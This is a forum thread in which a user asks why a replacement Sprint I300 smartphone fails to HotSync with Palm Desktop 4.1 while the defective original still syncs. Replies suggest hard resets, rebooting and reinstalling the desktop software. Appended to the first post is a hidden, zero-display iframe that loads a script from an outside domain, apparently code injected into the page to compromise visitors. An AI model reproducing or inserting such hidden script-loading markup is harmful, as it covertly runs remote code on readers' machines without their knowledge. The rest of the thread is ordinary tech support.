+ Reply to Thread

Unhappy Replacement I300 won't hotsync!

The screen on my first I300 became unresponsive so Sprint sent me a replacement phone. After receiving my replacement phone, I charged the battery and turned on the phone. The phone started working immediately, without having to be activated, with my original phone number. I put the phone in the cradle and try to do a Direct Serial Hotsync to restore all of my stored info, and I get the message: "Hotsync Problem. The connection between your handheld computer and the desktop could not be established. Please check your setup and try again." However when I put the defective phone in the cradle and hit the Hotsync button, it Hotsyncs without a problem. I am using Palm Desktop 4.1. Please help!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Sync problems

Try a hard reset on the new phone. Something could be off the way it's set now. If that doesn't do it, it could be a problem with the phone itself.

I am a fairly new pda user, but I understand that the pda forms a link with a specific pc and vice versa. You may need to "reset" the link on your pc so that is recognizes that it now needs to hotsync with the new phone. I'm not sure how this is done, I'm about to go through it because I'm moving from a separate pda & cell phone to an I300 that I purchased used.
    Hope this is helpful.

Resetting link between PC and handheld

"You may need to "reset" the link on your pc so that is recognizes that it now needs to hotsync with the new phone. "

Tony-OKC and others - can anyone tell me how to do the above? Thanks.

Administrator
    simply rebooting the machine is all you need to do...

you can also uninstall and reinstall the dekstop software.... be sure and unplug the cradle if/when you do this...

soft resetting the phone will usually help...

I have tried rebooting my computer and also soft and hard resetting the palmphone. These have not fixed the hotsync problem.

I will try uninstalling and reinstalling the Palm Desktop. But how do I do this without losing all of my stored information (i.e. addresses, memos, schedule items, etc.)? Thank you very much for your help.